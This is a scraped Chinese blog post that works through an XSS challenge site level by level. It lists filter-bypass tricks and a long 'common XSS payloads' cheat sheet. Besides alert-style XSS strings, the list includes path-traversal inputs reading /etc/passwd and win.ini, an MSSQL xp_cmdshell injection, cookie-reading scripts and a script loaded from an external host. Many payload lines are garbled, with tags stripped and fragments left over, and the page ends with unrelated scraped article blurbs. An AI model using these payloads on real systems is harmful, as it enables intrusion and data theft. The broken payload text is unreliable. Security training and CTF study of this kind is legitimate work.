daxi0ng
daxi0ng

XSS挑战的测试

XSS挑战地址:http://xss.tesla-space.com/

参考两篇文章:

一、https://xz.aliyun.com/t/1206

二、https://www.cnblogs.com/r00tuser/p/7407459.html

总结来说绕过姿势:

1、闭合前面的标签,后面构造xss语句

2、过滤尖括号

用事件来弹窗

' oninput=alert`1` //
' oninput=alert`1` '
' onchange=alert`1` //
' onchange=alert`1` '

3、过滤on,script

使用JavaScript伪协议

"> click me //
"> 111 //
"> axxx //

4、过滤on,src,href

尝试大小写绕过

">  //
">  //

5、过滤一遍关键字等

双写关键字绕过

" oonninput=alert(1) "
"> alert`xss` //

6、过滤javascript关键字

使用HTML字符实体'a'='a'绕过

javascript:alert(1)

URL编码绕过

javascript:%61lert(1)

7、必须包含http://之类的

javascript:alert(1)//http://www.0aa.me  //利用注释
javascript:%0dhttp://www.0aa.me%0dalert(1)  //不能用注释的情况下

8、

输入点在url中,参数是keyword

首先测试以下过滤情况

' ">

群友大神给的payload:

url=&t_sort=" type="text" onclick="alert()
http://127.0.0.1/xss/level10.php?keyword=888888&t_sort="; type="text" onclick="alert()
http://127.0.0.1/xss/level10.php?keyword=888888&t_sort=" type="" onclick="alert()
http://127.0.0.1/xss//level10.php?keyword=well done!&t_sort=" onmouseover=alert(1) type="text"
http://127.0.0.1/xss//level10.php?keyword=well done!&t_sort=8888" type="text" onmouseover="alert(666)

测试一下有的是User-Agent,有的是Cookies里有回显。

修改为 " type="text" οnmοuseοver="alert()之类的payload即可,可以repeat几次看看哪些地方需要闭合。

9、使用带有xss代码的图片进行上传。

10、过滤空格,/,script

使用%0d %0a分割

/level16.php?keyword=
http://127.0.0.1/xss//level16.php?keyword=
http://127.0.0.1/xss//level16.php?keyword=
http://127.0.0.1/xss//level16.php?keyword=
http://127.0.0.1/xss//level16.php?keyword=

11、过滤尖括号,双引号

用on事件

/level17.php?arg01=a&arg02= onmouseover=alert(1)
http://127.0.0.1/xss//level17.php?arg01=a&arg02=b 8888 onmouseover=alert(1)
http://127.0.0.1/xss//level18.php?arg01=a&arg02=b onmouseout=alert(1)
http://127.0.0.1/xss//level18.php?arg01=a&arg02=b onmouseout=alert`1`
http://127.0.0.1/xss//level18.php?arg01=a&arg02=b onmouseover=alert`1`

 

一些常用的XSS payloads

1'"()&%
 

 

 
'>
 
='>
 

 
%3Cscript%3Ealert('XSS')%3C/script%3E
 

 

 
%0a%0a.jsp
 
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
 
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 

 

 
a.jsp/
 
a?
 
">
 
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
 
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
%3Cscript%3Ealert(document. domain);%3C/script%3E&
 
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 

 

 

 

 

 

 

 

 

 

 
"";' > out
 

 

 

 

 

 

 

 


 

 

 

 

 

 

 

 

 


 


 


 

 

 

 

 

 

 
getURL("javascript:alert('XSS')")
 
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
 

 
"> <"
 

 

 

 

 

 

 

 
PT src="http://xss.ha.ckers.org/a.js">
 
link
 

 

 

 

 

 

 

 

 

 
<
 

 

 

 

 

 

 


 

 

 

 

 

 

 

 

 


 


 


 

 

























你可能感兴趣的:(漏洞挖掘)






    

  • python docker 镜像过大_【转】六种减小Docker镜像大小的方法
weixin_39627408
pythondocker镜像过大

    转自P牛,vulnhub作者,擅长代码审计和漏洞挖掘,今天看到他的公众号发了一篇这个,正好平时自己的工作也有需求,整理记录如下。=========================================我从2017年做Vulhub开始,一直在和一个麻烦的问题做斗争:在编写Dockerfile的时候,如何减小dockerbuild生成的镜像大小?这篇文章就给大家总结一下我自己使用过的六种减小
    

    • 

  • 逻辑漏洞挖掘 | 对某某招商网的一次渗透
zkzq
web安全安全

    本文由掌控安全学院-高粱红投稿开局一个登录框:发现登陆点,逻辑漏洞的姿势不断在脑海反反复复,说干就干看到验证码,尝试绕过重复发包后,发现可以重复利用事情简单了起来,上字典,手机号爆破运气不错,跑出了多个账号整理一下拿到的账号Cj**59Zw**22Rh**opHo**ngNt**23Wu**dl然后试试看能不能找回密码输入爆破得到的账号,继续往下确认修改的账户通过手机号找回点击获取验证码,然后验证
    

    • 

  • 齐治堡垒机
pow(^_^,N)

    一、基本信息参考:https://www.cnvd.org.cn/flaw/show/1559039补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。二、漏洞挖掘过程这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。1、挖掘过程首先,在安装齐治运维堡垒机客户端软件ShtermClie
    

    • 

  • 【网络安全】信息收集系列|子域名收集姿势总结
IT老涵
网络安全安全渗透测试信息安全运维

    声明:本文初衷为分享网络安全知识,请勿利用技术做出任何危害网络安全的行为,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责概述在渗透测试或SRC漏洞挖掘中,安全测试人员通常会得到一些域名资产。为了更好地进行渗透测试,通常都需要进行子域名收集。为什么需要进行子域名收集?扩大资产范围,可以增加漏洞发现的概率众所周知,一般情况下主站的安全性可能相对较高,而一些不常用
    

    • 

  • 【揭秘家用路由器0day】Wine + IDA环境搭建
zephyrOOO
路由器安全安全pythonlinux

    今天开始学习《揭秘家用路由器0day漏洞挖掘技术》,由于这本书是9年前出版的,里面介绍的环境搭建方法有些过时,碰了很多壁,在此做记录系统环境root@ubuntu-VM:~#lsb_release-aNoLSBmodulesareavailable.DistributorID:UbuntuDescription:Ubuntu23.04Release:23.04Codename:lunarroot@
    

    • 

  • 揭秘家用路由器0day漏洞挖掘技术原始环境搭建
此人亦非
二进制漏洞路由器固件固件分析Ubuntu12

    对于未知的复杂事物,应该先去跟谁它,观察它,然后挖掘其规律。《揭秘家用路由器0day漏洞挖掘技术》出版于2015年,使用的系统环境为ubuntu-12.04.4-desktop-i386(ubuntu1232bit桌面版)。里面涉及的dir-645,dir-815等的溢出漏洞,在exploit-db上的时间为2013年前段,距离当前(2019)已经6年多了。作者当初使用相关的软件和系统距今发生很多
    

    • 

  • 【代码审计-2】PHP框架MVC类文件上传断点测试挖掘
阿福超级胖
小迪安全笔记phpmvc开发语言

    1.文件上传漏洞挖掘:(1)关键字搜索(函数、键字、全局变量等):比如$_FILES,move_uploades_file等(2)应该功能抓包:寻找任何可能存在上传的应用功能点,比如前台会员中心,后台新闻添加等。(3)漏洞举例:逻辑漏洞-先上传文件再判断后缀名,通过MIME类型来判断文件类型、前端校验文件类型而服务端未校验。2.MVC开发框架类:模型Model–管理大部分的业务逻辑和所有的数据库逻
    

    • 

  • 海云安蝉联两届2023年度移动互联网APP产品安全漏洞治理优秀案例 荣获工信部CAPPVD漏洞库三星技术支撑单位
海云安
海云安网络安全web安全

    为深入贯彻落实《网络产品安全漏洞管理规定》,规范移动互联网App产品安全漏洞发现、报告、修补和发布等行为,提升网络产品提供者安全漏洞管理意识,探索最前沿的漏洞挖掘技术发展趋势和创新应用,近日,由中国软件评测中心、工业和信息化部网络安全威胁和漏洞信息共享平台移动互联网App产品安全漏洞专业库举办的“第四期移动互联网App产品安全漏洞技术沙龙”在北京召开。作为工信部CAPPVD漏洞库(以下简称“CAP
    

    • 

  • 权威认可!海云安喜获CAPPVD漏洞库感谢信
海云安
海云安安全网络web安全

    近日,工业和信息化部移动互联网APP产品安全漏洞专业库(以下简称“CAPPVD漏洞库”)向海云安发来感谢信,这是对海云安参与移动互联网APP产品安全漏洞管理系列工作的高度认可与感谢,并期望在下一年共同携手支撑国家网络产品安全漏洞管理工作。作为工信部CAPPVD漏洞库三星支撑单位代表,海云安积极完成重要漏洞信息报送、原创漏洞报送、漏洞发现、漏洞分析、漏洞挖掘等各项支撑工作。海云安两度蝉联“2023年
    

    • 

  • 【安全漏洞】一次前台任意文件下载漏洞挖掘
H_00c8

    1、起因日常闲逛,翻到了某后台系统先是日常手法操作了一番,弱口令走起admin/123456yyds!U1s1,这个后台功能点少的可怜,文件上传点更是别想不过那个备份管理的界面引起了我的兴趣,似乎有点意思filename参数后面直接跟上了文件名,这很难让人不怀疑存在任意下载漏洞抓包,放到burp中,发现果然存在任意文件下载2、经过经过fofa收集,我发现这是一个小通用,正当我打算兴致勃勃的打一发别
    

    • 

  • 通付盾获2023年度移动互联网APP产品安全漏洞治理优秀案例 荣获工信部CAPPVD漏洞库技术支撑单位
数信云 DCloud
网络web安全安全

    为深入贯彻落实《网络产品安全漏洞管理规定》,规范移动互联网App产品安全漏洞发现、报告、修补和发布等行为,提升网络产品提供者安全漏洞管理意识,探索最前沿的漏洞挖掘技术发展趋势和创新应用,在上级主管部门指导支持下,1月16日,中国软件评测中心(工业和信息化部软件与集成电路促进中心)、工业和信息化部网络安全威胁和漏洞信息共享平台移动互联网App产品安全漏洞专业库(CAPPVD漏洞库)在北京举办了“第四
    

    • 

  • SSRF漏洞原理攻击与防御(超详细总结)
程序员桔子
网络服务器运维

    SSRF漏洞原理攻击与防御目录SSRF漏洞原理攻击与防御一、SSRF是什么?二、SSRF漏洞原理三、SSRF漏洞挖掘四、产生SSRF漏洞的函数五、SSRF中URL的伪协议六、SSRF漏洞利用(危害)七、SSRF绕过方式八、SSRF漏防御提示:以下是本篇文章正文内容,下面案例可供参考一、SSRF是什么?SSRF(Server-SideRequestForgery:服务器端请求伪造)是一种由攻击者构造
    

    • 

  • 网络攻防中黑客藏用攻击手段:SSRF服务器端请求伪造,SSRF漏洞绕过IP限制,SSRF漏洞挖掘经验
代码讲故事
Hacker技术提升基地网络tcp/ip网络协议SSRF漏洞绕过服务器端请求伪造漏洞挖掘

    网络攻防中黑客藏用攻击手段:SSRF服务器端请求伪造,SSRF漏洞绕过IP限制,SSRF漏洞挖掘经验。SSRF(服务端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF形成的原因:服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做
    

    • 

  • SRC挖洞骚思路整理
知攻善防实验室
安全web安全网络安全威胁分析网络安全

    关注本公众号,长期推送漏洞文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。73篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!/SRC漏洞挖掘思路/
    

    • 

  • 被忽视的暗面:客户端应用漏洞挖掘之旅
wei_java144
编程技术安全网络web安全

    被忽视的暗面:客户端应用漏洞挖掘之旅前言在2023年12月15日,我有幸参加了由“字节跳动安全中心”举办的“安全范儿”沙龙活动。作为“中孚信息元亨实验室”的一员,我被邀请分享名为“被忽视的暗面:客户端应用漏洞挖掘之旅”的技术议题。现整理成文字版分享出来,由于我不是专门从事二进制工作,因此文章中存在笔误或解释不对的地方,请各位师傅多多包涵!客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领
    

    • 

  • 路由器固件安全漏洞分析——开端入坑
昵称还在想呢
路由器固件安全漏洞分析智能路由器安全c语言服务器

    前言今日我们开一个新坑,——路由器固件的分析与漏洞挖掘。尽管网上文章分析不少,但我还是感觉缺少点什么........虽然本人实力有限,比不上那些逆向大佬。我还是喜欢把自己的思路分享给大家。固件的分析不同与常规的web网站。我们没有这款固件开发的原始的.c代码,只能利用工具提取固件的文件系统,使用逆向软件分析固件的可执行程序。如idapro在逆向界面中我们只能看到的是一条条指令操作着寄存器,栈空间地
    

    • 

  • web漏洞挖掘指南 -XSS跨站脚本攻击
火线安全平台

    一、漏洞原理跨站脚本英文全称(CrossSiteScripting跨站脚本),为了不和css层叠样式表(英文全称:CascadingStyleSheets)混淆,因此将跨站脚本缩写为XSS。产生XSS漏洞根本原因其实是web应用未对用户的输入进行严格的过滤和转义,导致攻击者可从正常的输入功能注入脚本代码,我常将xss攻击理解为一种javascript注入,当带有xss恶意代码的页面被其他用户访问到
    

    • 

  • Patch2QL:开源供应链漏洞挖掘和检测的新方向
腾讯安全
开源供应链安全同源漏洞

    背景开源生态的上下游中,漏洞可能存在多种成因有渊源的其它缺陷,统称为“同源漏洞”,典型如:上游代码复用缺陷。开源贡献者在实现功能相似的模块时,常复用已有模块代码或逻辑;当其中某个模块发现漏洞后,该漏洞可能随复用也出现在相似模块中。接口或代码误用。某些接口,特别是欠缺充分文档的项目内部接口,可能误导开发者以相同错误方式调用;而某些不完备的代码,例如示例代码或开源代码片段,也常被开发者直接使用。版本分
    

    • 

  • 【网络安全|漏洞挖掘】ChatGPT 再曝安全漏洞,被指泄露私密对话
网安老伯
web安全chatgpt安全linux网络安全科技bug

    风靡全球的聊天机器人ChatGPT近日再次陷入安全风波,被曝泄露用户同机器人的私密对话,其中包含用户名、密码等敏感信息。ArsTechnica网站援引其读者提供的截图报道称,ChatGPT泄露了多段非用户本人的对话内容,包含了大量敏感信息。该读者原本只是使用ChatGPT进行一个无关的查询,却意外发现聊天记录中出现了不属于自己的对话内容。这些泄露的对话内容涉及多个方面。其中一组对话似乎来自药房处方
    

    • 

  • 【42万字,2902页】全网最全《零基础网络安全/黑客自学笔记》,爆肝分享!
网安员阿道夫
web安全安全网络安全

    这次为大家带来一份零基础也能学会的《全网最全黑客自学笔记》,“全网最全”可不是吹牛的,整个笔记一共42万字,2902页,95个章节。这份笔记涵盖了网络安全导论、渗透测试基础、网络基础、Linux操作系统基础、web安全等等入门知识点;也有密码爆破、漏洞挖掘、SQL注入等进阶技术;还有反序列化漏洞、RCE、内网渗透、流量分析等高阶提升内容;最后还总结了一套护网蓝队攻略。部分内容展示:因为所包含的内容
    

    • 

  • 39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用
PT_silver
小迪安全前端csrf网络

    文章目录CSRFCSRF原理CSRF安全问题黑盒怎么判断SSRFSSRF原理SSRF黑盒可能出现的地方有SSRF,可以做什么事儿?SSRF漏洞挖掘CSRFCSRF原理测试CSRF漏洞的工具:CSRFTesterCSRFTester设置代理,会抓取新建管理员时向服务器发送的数据包,然后用抓取的数据包构造HTML页面。注意发送注册信息的形式(表单?IMG?)CSRF利用流程:获取目标的触发数据包;利用
    

    • 

  • 漏洞挖掘账号注册流程
人生的方向随自己而走
笔记安全

    漏洞挖掘账号注册流程提交漏洞的平台有很多,以下是一些常见的平台:1.HackerOne:全球最大的漏洞赏金平台,有很多大型公司和组织参与,提供了丰厚的奖金和奖励。2.Bugcrowd:另一个知名的漏洞赏金平台,有众多公司和组织参与,提供了多种形式的奖励。3.OpenBugBounty:一个开放的漏洞报告平台,允许任何人报告漏洞,优秀的报告者可以获得声誉和认可。4.Cobalt:一个专注于企业漏洞测
    

    • 

  • baijia靶场漏洞挖掘
沧海一粟@星火燎原
安全web安全

    打开靶场http://localhost:83/baijiacms/1、任意用户注册点击个人中心>用户登录>免费注册,注入账号密码,抓包批量注册这个是已注册的用户返回。这个是未注册的用户,通过批量注册可以探测到系统已有用户2、XSS漏洞打开我的地址,输入信息点击提交点击保存,有弹框
    

    • 

  • 了解一下src漏洞平台是什么,有哪些?
沧海一粟@星火燎原
安全

    SRCSRC(SecurityResearcherAcknowledgementProgram)是各大互联网厂商开启的漏洞发现奖励计划,也就是我们常说的漏洞赏金计划(bugbounty),旨在鼓励广大的安全研究人员积极发现厂商产品或服务安全漏洞并向厂商提交漏洞报告,帮助厂商修补漏洞,保障整个互联网的安全。SRC漏洞挖掘的好处1、获取奖金和积分通过SRC漏洞挖掘可以获取漏洞奖金和积分等奖励,有的互联
    

    • 

  • BaiJiaCms 漏洞挖掘
[email protected]
安全

    今天来和大家讲一下baijiacms的漏洞挖掘,小编一般都是黑盒测试,没有对其代码审计,(等小编把常见的漏洞都了解一下在进行代码审计)1.存储型XSS首先需要进入管理员账号找到一个“调用第三方统计代码”的方框,猜测其能执行代码,那就输入xss的poc然后当我们访问的时候就会发现,这里存在XSS2.用户批量注册我们在客户端的注册用户处可以发现,他是没有对注册用户使用验证码的!!那我们就可以进行用户批
    

    • 

  • 企业SRC挖掘个人看法
[email protected]
网络安全web安全src漏洞挖掘

    昨晚上课网安的老师带我们现场挖掘漏洞,可谓是一场视觉盛宴!!!真的没有对比就没有伤害,其间他也分享了一些漏洞挖掘的思路,让我来回顾一下!!1.JWT爆破jwt(json_web_token)是一种签名验证机制,其中的header和payload部分都以base64编码,直接进行解码即可,当我们发送数据给服务端的时候,就会包含jwt,这时候我们可以将alg字段置为none,然后将签名字段删除并且提交
    

    • 

  • 一个*份证后四位的验证思路-逻辑漏洞挖掘
网安攻城狮-小李
web安全安全网络网络安全漏洞挖掘

    0x01信息收集通过抖*、快*等APP获得其ID为:***011201姓名:王**````通过其作品获得地址为:⼭东泰安````学校:⼭东*****文章末尾可领取资料(渗透字典、app渗透教程、钓鱼例子、书籍等)0x02信息爆破发现某校公众号,有个⽹上缴费⻚⾯,可通过*号、*机号或*份证号判断是否存在该小伙伴。尝试爆破,发现waf拦截。只能换思路。→点击获取网络安全资料·攻略←200多本网络安全系
    

    • 

  • 掌控web安全工程师高薪正式班渗透白帽linux网络安全ctf零基础 实战笔记
网课充电

    已报名入坑,点赞评论交流获取,记录下学习内容01Web通信原理02Web安全前后端基础03信息搜集04注入—全方位利用05数据库注入06前端渗透测试07文件上传解析漏洞(直播)08漏洞原理到利用09漏洞挖掘与代码审计10福利附送大礼包11结业典礼
    

    • 

  • 实战 | 公益SRC上分技巧
黑客大佬
SRC

    本文由掌控安全学院-杳若投稿前言漏洞挖掘有时候换几个思路,事半功倍下面讲解一些很简单,但是实用的思路案例一、若依系统配置不当讲解了这么多系统,兜兜转转又回到了若依其实最早的若依系统,在js中已经将账号密码自动填充,我们一访问就可以直接登录。例如我们找到某个若依前端文件如下我们将type="password"改成type="text"那么我们为什么不直接搜索一些前端填充好的站点呢?例如鹰图body=
    

    • 

  • 2024年网安面试题大全
学安全的修狗
笔记网络安全面试

    2024年网安面试题大全秋招目录(随时更新)有最新的公司校招信息可以随时issue,我会第一时间更新以安全为主业的公司我就不放了(360、深信服、奇安信等),主要放不以安全为主业但有安全业务的公司公司及投递链接base岗位部门投递时间字节跳动提前批北京、深圳、杭州渗透测试工程师安全研究工程师安全工程师安全与风控无恒实验室7.7~7.31华为提前批基本全覆盖网络安全与隐私保护工程师基本覆盖漏洞挖掘可
    

    • 

  • ViewController添加button按钮解析。(翻译)
张亚雄
c

    <div class="it610-blog-content-contain" style="font-size: 14px"></div>//  ViewController.m
//  Reservation software
//
//  Created by 张亚雄 on 15/6/2.

    

    • 

  • mongoDB 简单的增删改查
开窍的石头
mongodb

       在上一篇文章中我们已经讲了mongodb怎么安装和数据库/表的创建。在这里我们讲mongoDB的数据库操作
      在mongo中对于不存在的表当你用db.表名 他会自动统计
下边用到的user是表明,db代表的是数据库
      添加(insert):

    

    • 

  • log4j配置
0624chenhong
log4j

    1) 新建java项目
2) 导入jar包,项目右击,properties—java build path—libraries—Add External jar,加入log4j.jar包。
3) 新建一个类com.hand.Log4jTest
package com.hand;
import org.apache.log4j.Logger;
public class 
    

    • 

  • 多点触摸(图片缩放为例)
不懂事的小屁孩
多点触摸

    多点触摸的事件跟单点是大同小异的,上个图片缩放的代码,供大家参考一下
import android.app.Activity;
import android.os.Bundle;
import android.view.MotionEvent;
import android.view.View;
import android.view.View.OnTouchListener
    

    • 

  • 有关浏览器窗口宽度高度几个值的解析
换个号韩国红果果
JavaScripthtml

    1 元素的 offsetWidth 包括border padding  content  整体的宽度。
clientWidth  只包括内容区 padding 不包括border。
clientLeft =  offsetWidth -clientWidth  即这个元素border的值
offsetLeft  若无已定位的包裹元素
    

    • 

  • 数据库产品巡礼:IBM DB2概览
蓝儿唯美
db2

    IBM DB2是一个支持了NoSQL功能的关系数据库管理系统,其包含了对XML,图像存储和Java脚本对象表示(JSON)的支持。DB2可被各种类型的企 业使用,它提供了一个数据平台,同时支持事务和分析操作,通过提供持续的数据流来保持事务工作流和分析操作的高效性。 DB2支持的操作系统
DB2可应用于以下三个主要的平台:
 
工作站,DB2可在Linus、Unix、Windo
    

    • 

  • java笔记5
a-john
java

    控制执行流程:
1,true和false
   利用条件表达式的真或假来决定执行路径。例:(a==b)。它利用条件操作符“==”来判断a值是否等于b值,返回true或false。java不允许我们将一个数字作为布尔值使用,虽然这在C和C++里是允许的。如果想在布尔测试中使用一个非布尔值,那么首先必须用一个条件表达式将其转化成布尔值,例如if(a!=0)。
2,if-els
    

    • 

  • Web开发常用手册汇总
aijuans
PHP

    一门技术,如果没有好的参考手册指导,很难普及大众。这其实就是为什么很多技术,非常好,却得不到普遍运用的原因。
正如我们学习一门技术,过程大概是这个样子:
①我们日常工作中,遇到了问题,困难。寻找解决方案,即寻找新的技术;
②为什么要学习这门技术?这门技术是不是很好的解决了我们遇到的难题,困惑。这个问题,非常重要,我们不是为了学习技术而学习技术,而是为了更好的处理我们遇到的问题,才需要学习新的
    

    • 

  • 今天帮助人解决的一个sql问题
asialee
sql

                今天有个人问了一个问题,如下:
type     AD      value         
A  
    

    • 

  • 意图对象传递数据
百合不是茶
android意图IntentBundle对象数据的传递

    学习意图将数据传递给目标活动; 初学者需要好好研究的
  
   1,将下面的代码添加到main.xml中
  
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http:/
    

    • 

  • oracle查询锁表解锁语句
bijian1013
oracleobjectsessionkill

    一.查询锁定的表
如下语句,都可以查询锁定的表
语句一:
select a.sid,
a.serial#,
p.spid,
c.object_name,
b.session_id,
b.oracle_username,
b.os_user_name
from v$process p, v$s
    

    • 

  • mac osx 10.10 下安装 mysql 5.6 二进制文件[tar.gz]
征客丶
mysqlosx

    场景:在 mac osx 10.10 下安装 mysql 5.6 的二进制文件。
环境:mac osx 10.10、mysql 5.6 的二进制文件
步骤:[所有目录请从根“/”目录开始取,以免层级弄错导致找不到目录]
1、下载 mysql 5.6 的二进制文件,下载目录下面称之为 mysql5.6SourceDir;
下载地址:http://dev.mysql.com/downl
    

    • 

  • 分布式系统与框架
bit1129
分布式

    RPC框架 Dubbo
什么是Dubbo
 
Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。其核心部分包含:    远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。    集群容错: 提供基于接
    

    • 

  • 那些令人蛋痛的专业术语
白糖_
springWebSSOIOC

    
spring
【控制反转(IOC)/依赖注入(DI)】:
由容器控制程序之间的关系,而非传统实现中,由程序代码直接操控。这也就是所谓“控制反转”的概念所在:控制权由应用代码中转到了外部容器,控制权的转移,是所谓反转。
简单的说:对象的创建又容器(比如spring容器)来执行,程序里不直接new对象。
Web
【单点登录(SSO)】:SSO的定义是在多个应用系统中,用户
    

    • 

  • 《给大忙人看的java8》摘抄
braveCS
java8

    函数式接口:只包含一个抽象方法的接口
lambda表达式:是一段可以传递的代码
 
 
 
你最好将一个lambda表达式想象成一个函数,而不是一个对象,并记住它可以被转换为一个函数式接口。
事实上,函数式接口的转换是你在Java中使用lambda表达式能做的唯一一件事。
 
方法引用:又是要传递给其他代码的操作已经有实现的方法了,这时可以使
    

    • 

  • 编程之美-计算字符串的相似度
bylijinnan
java算法编程之美

    
public class StringDistance {
/**
* 编程之美 计算字符串的相似度
* 我们定义一套操作方法来把两个不相同的字符串变得相同,具体的操作方法为:
* 1.修改一个字符(如把“a”替换为“b”);
* 2.增加一个字符(如把“abdd”变为“aebdd”);
* 3.删除一个字符(如把“travelling”变为“trav
    

    • 

  • 上传、下载压缩图片
chengxuyuancsdn
下载

    /**
*
* @param uploadImage --本地路径(tomacat路径)
* @param serverDir --服务器路径
* @param imageType --文件或图片类型
* 此方法可以上传文件或图片.txt,.jpg,.gif等
*/
public void upload(String uploadImage,Str
    

    • 

  • bellman-ford(贝尔曼-福特)算法
comsci
算法F#

    Bellman-Ford算法(根据发明者 Richard Bellman 和 Lester Ford 命名)是求解单源最短路径问题的一种算法。单源点的最短路径问题是指:给定一个加权有向图G和源点s,对于图G中的任意一点v,求从s到v的最短路径。有时候这种算法也被称为 Moore-Bellman-Ford 算法,因为 Edward F. Moore zu 也为这个算法的发展做出了贡献。
与迪科
    

    • 

  • oracle ASM中ASM_POWER_LIMIT参数
daizj
ASMoracleASM_POWER_LIMIT磁盘平衡

    ASM_POWER_LIMIT
该初始化参数用于指定ASM例程平衡磁盘所用的最大权值,其数值范围为0~11,默认值为1。该初始化参数是动态参数,可以使用ALTER  SESSION或ALTER  SYSTEM命令进行修改。示例如下:
SQL>ALTER  SESSION  SET   Asm_power_limit=2;

    

    • 

  • 高级排序:快速排序
dieslrae
快速排序

    
public void quickSort(int[] array){
this.quickSort(array, 0, array.length - 1);
}
public void quickSort(int[] array,int left,int right){
if(right - left <= 0
    

    • 

  • C语言学习六指针_何谓变量的地址 一个指针变量到底占几个字节
dcj3sjt126com
C语言

    # include <stdio.h>
int main(void)
{
/*
1、一个变量的地址只用第一个字节表示
2、虽然他只使用了第一个字节表示,但是他本身指针变量类型就可以确定出他指向的指针变量占几个字节了
3、他都只存了第一个字节地址,为什么只需要存一个字节的地址,却占了4个字节,虽然只有一个字节,
但是这些字节比较多,所以编号就比较大,

    

    • 

  • phpize使用方法
dcj3sjt126com
PHP

    phpize是用来扩展php扩展模块的,通过phpize可以建立php的外挂模块,下面介绍一个它的使用方法,需要的朋友可以参考下
安装(fastcgi模式)的时候,常常有这样一句命令:
代码如下:
/usr/local/webserver/php/bin/phpize
 
一、phpize是干嘛的?
phpize是什么?
phpize是用来扩展php扩展模块的,通过phpi
    

    • 

  • Java虚拟机学习 - 对象引用强度
shuizhaosi888
JAVA虚拟机

    
本文原文链接:http://blog.csdn.net/java2000_wl/article/details/8090276 转载请注明出处!
无论是通过计数算法判断对象的引用数量,还是通过根搜索算法判断对象引用链是否可达,判定对象是否存活都与“引用”相关。
引用主要分为 :强引用(Strong Reference)、软引用(Soft Reference)、弱引用(Wea
    

    • 

  • .NET Framework 3.5 Service Pack 1(完整软件包)下载地址
happyqing
.net下载framework

     
Microsoft .NET Framework 3.5 Service Pack 1(完整软件包) 
http://www.microsoft.com/zh-cn/download/details.aspx?id=25150
Microsoft .NET Framework 3.5 Service Pack 1 是一个累积更新,包含很多基于 .NET Framewo
    

    • 

  • JAVA定时器的使用
jingjing0907
javatimer线程定时器

    1、在应用开发中,经常需要一些周期性的操作,比如每5分钟执行某一操作等。
对于这样的操作最方便、高效的实现方式就是使用java.util.Timer工具类。
privatejava.util.Timer timer;
timer = newTimer(true);
timer.schedule(
newjava.util.TimerTask() { public void run()

    

    • 

  • Webbench
流浪鱼
webbench

    首页下载地址 http://home.tiscali.cz/~cz210552/webbench.html
Webbench是知名的网站压力测试工具,它是由Lionbridge公司(http://www.lionbridge.com)开发。
Webbench能测试处在相同硬件上,不同服务的性能以及不同硬件上同一个服务的运行状况。webbench的标准测试可以向我们展示服务器的两项内容:每秒钟相
    

    • 

  • 第11章 动画效果(中)
onestopweb
动画

    index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
    

    • 

  • windows下制作bat启动脚本.
sanyecao2314
javacmd脚本bat

    java -classpath C:\dwjj\commons-dbcp.jar;C:\dwjj\commons-pool.jar;C:\dwjj\log4j-1.2.16.jar;C:\dwjj\poi-3.9-20121203.jar;C:\dwjj\sqljdbc4.jar;C:\dwjj\voucherimp.jar com.citsamex.core.startup.MainStart 
    

    • 

  • Java进行RSA加解密的例子
tomcat_oracle
java

    加密是保证数据安全的手段之一。加密是将纯文本数据转换为难以理解的密文;解密是将密文转换回纯文本。   数据的加解密属于密码学的范畴。通常,加密和解密都需要使用一些秘密信息,这些秘密信息叫做密钥,将纯文本转为密文或者转回的时候都要用到这些密钥。   对称加密指的是发送者和接收者共用同一个密钥的加解密方法。   非对称加密(又称公钥加密)指的是需要一个私有密钥一个公开密钥,两个不同的密钥的
    

    • 

  • Android_ViewStub
阿尔萨斯
ViewStub

    public final class ViewStub extends View
java.lang.Object
android.view.View
android.view.ViewStub
类摘要: ViewStub 是一个隐藏的,不占用内存空间的视图对象,它可以在运行时延迟加载布局资源文件。当 ViewSt
    

    •